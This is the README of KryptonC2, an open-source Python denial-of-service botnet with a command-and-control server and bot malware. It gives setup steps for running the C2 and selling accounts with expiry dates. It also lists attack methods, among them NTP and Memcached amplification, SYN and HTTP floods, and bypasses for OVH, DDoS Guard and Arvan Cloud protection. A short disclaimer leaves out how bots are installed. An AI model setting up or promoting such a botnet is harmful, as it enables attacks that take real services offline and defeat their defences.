KryptonC2 is a basic open source denial of service botnet system written in Python 3, consists of a connect and control server and a bot malware script.
-
Install Git and Python 3 on your server.
-
Clone the KryptonC2 Github repository to your server via Git:
$ git clone https://github.com/CirqueiraDev/KryptonC2
. -
Change the host address and C&C port in the configuration section in bot.py to your server address and C&C port.
-
Install the requirements.txt
-
Start the C2 server by executing the command:
$ python main.py
. -
Add accounts in logins.txt using the format:
username:password:yyyy-mm-dd
. -
Configure the port on the config.json
{ "cnc_host": "0.0.0.0", "reg_host": "0.0.0.0", "cnc_port": 5511, "reg_port": 5512 }
. -
Connect to the server through PuTTY on a raw socket connection.
2023-12-04.21-40-51.mp4
📍 Compiling the malware and installing it on vulnerable devices won't be told as it's highly illegal to get remote access to devices without permission. Use of this project for illegal activities is at own risk! I'm not responsible for any of your taken actions!
- New method
(HTTP SPOOFER) L7 Method
. 11/11/2023 - New method
(NTP Reflection + Payload) L4 Method
. 12/11/2023 - New method
(Memcached + Custom Payload) L4 Method
. 12/11/2023 - New method
(POD) L3 Method
. 13/11/2023 - New method
(ICMP) L3 Method
. 13/11/2023 - Updated Method
(HTTP IO) L7 Method
. 14/11/2023 - Added expiration date for accounts
(AAAA-MM-DD)
. 26/11/2023 - Update commands and visual. 02/12/2023
- New method
(SYN Flood) L4 method
and(ACK Flood) Removed
. 04/12/2023 - Update visual and fix bugs. 01/22/2024
Method: OVH | Bypass OVH
Method: POST | POST Flood
Method: STRESS | Send HTTP Packet With High Byte
Method: OSTRESS | STRESS Without Proxy
Method: BYPASS | Bypass Normal AntiDDoS
Method: DGB | DDoS Guard Bypass
Method: AVB | Arvan Cloud Bypass
- Send attacks with API's
- Optimize malicious code
📌Credits: https://github.com/NixWasHere/NixC2
💰 Donation Links:
BTC: bc1qynerkzreqgeuhfywfelhz45df2a73f38cmctzu
ETH: 0xb685A72EdA6a016A43d75D269FdFa6315C80F8c9
👑Author:
- CirqueiraDev
- Discord: cirqueira